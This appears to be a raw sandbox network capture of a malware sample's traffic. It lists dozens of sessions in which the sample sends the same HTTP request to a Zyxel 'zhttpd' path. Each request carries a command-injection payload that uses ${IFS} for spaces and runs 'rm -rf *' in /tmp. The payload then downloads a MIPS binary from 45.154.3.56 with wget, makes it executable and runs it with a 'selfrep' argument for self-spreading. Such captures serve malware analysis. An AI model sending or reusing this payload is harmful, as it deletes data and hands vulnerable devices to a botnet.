                        Mar 12, 2024 08:50:23.016896963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        256192.168.2.1433778203.99.175.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.016993999 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        257192.168.2.1440844148.78.253.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017066002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        258192.168.2.1433222123.146.54.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017127037 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        259192.168.2.1449976113.173.155.229443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017201900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        260192.168.2.1458158180.59.189.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017340899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        261192.168.2.1458316209.135.39.17443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017412901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        262192.168.2.1434784168.223.79.160443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017493963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        263192.168.2.1455396110.143.163.111443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017546892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        264192.168.2.1457466211.225.139.91443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017661095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        265192.168.2.14569942.7.128.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017739058 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        266192.168.2.1433492154.216.216.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017821074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        267192.168.2.144512871.232.77.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017894983 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        268192.168.2.1442750180.185.88.246443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.017945051 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        269192.168.2.145467658.177.89.249443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018037081 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        270192.168.2.1448996200.200.207.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018143892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        271192.168.2.1445544146.150.80.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018203020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        272192.168.2.145601466.135.196.183443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018290043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        273192.168.2.1455554104.217.165.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018366098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        274192.168.2.1453174220.103.27.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018465996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        275192.168.2.1458458184.121.89.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018527031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        276192.168.2.1440834180.69.165.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018610001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        277192.168.2.1447518129.232.143.202443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018708944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        278192.168.2.1433808189.8.241.230443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018820047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        279192.168.2.1454546122.232.31.67443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018903017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        280192.168.2.1445728186.12.128.65443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.018982887 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        281192.168.2.144910868.157.23.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019033909 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        282192.168.2.1455384186.52.252.185443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019110918 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        283192.168.2.1444256133.220.56.6443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019226074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        284192.168.2.1438396184.2.207.102443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019340992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        285192.168.2.144353238.18.168.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019375086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        286192.168.2.145599875.76.40.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019509077 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        287192.168.2.145388423.183.228.183443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019541979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        288192.168.2.1450578202.5.138.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019639015 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        289192.168.2.1433890184.183.56.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019745111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        290192.168.2.1439804107.46.54.223443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019820929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        291192.168.2.144067659.132.220.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019870996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        292192.168.2.1454328187.23.103.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.019958973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        293192.168.2.1432988141.228.2.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.020049095 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        294192.168.2.1448778134.48.141.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.020152092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        295192.168.2.1450764191.100.143.195443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.020275116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        296192.168.2.144422645.124.11.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.020349026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        297192.168.2.143355461.129.70.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.020394087 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        298192.168.2.1437862112.55.53.118443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.020446062 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        299192.168.2.1460274106.162.113.236443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.020570993 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        300192.168.2.1438626184.9.24.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.987216949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        301192.168.2.1442770112.254.181.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.987272024 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        302192.168.2.1448776100.131.129.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.987323046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        303192.168.2.1437356190.127.199.7443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.987366915 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        304192.168.2.1460108167.143.123.31443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.987402916 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        305192.168.2.1451740129.71.80.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.987442017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        306192.168.2.145352853.201.169.55443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.987504005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        307192.168.2.1450608158.2.82.215443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.987550020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        308192.168.2.1434078211.237.26.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.987637043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        309192.168.2.1452034110.254.64.89443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:23.987761974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        310192.168.2.143408040.204.127.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996494055 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        311192.168.2.1456634161.112.225.74443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996552944 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        312192.168.2.1443336187.91.254.250443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996581078 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        313192.168.2.1435952198.114.250.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996611118 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        314192.168.2.1458812154.126.211.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996643066 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        315192.168.2.145284671.39.235.143443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996697903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        316192.168.2.1455250181.76.63.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996750116 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        317192.168.2.1433226137.235.54.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996787071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        318192.168.2.145095424.196.79.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996812105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        319192.168.2.144807877.143.121.19443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996845007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        320192.168.2.145628438.102.193.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996926069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        321192.168.2.1443634220.148.103.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.996968031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        322192.168.2.1439474119.140.72.158443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997010946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        323192.168.2.144335859.237.70.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997092962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        324192.168.2.144498661.240.107.119443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997133017 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        325192.168.2.1435228102.221.121.209443
                        TimestampBytes transferredDirectionData
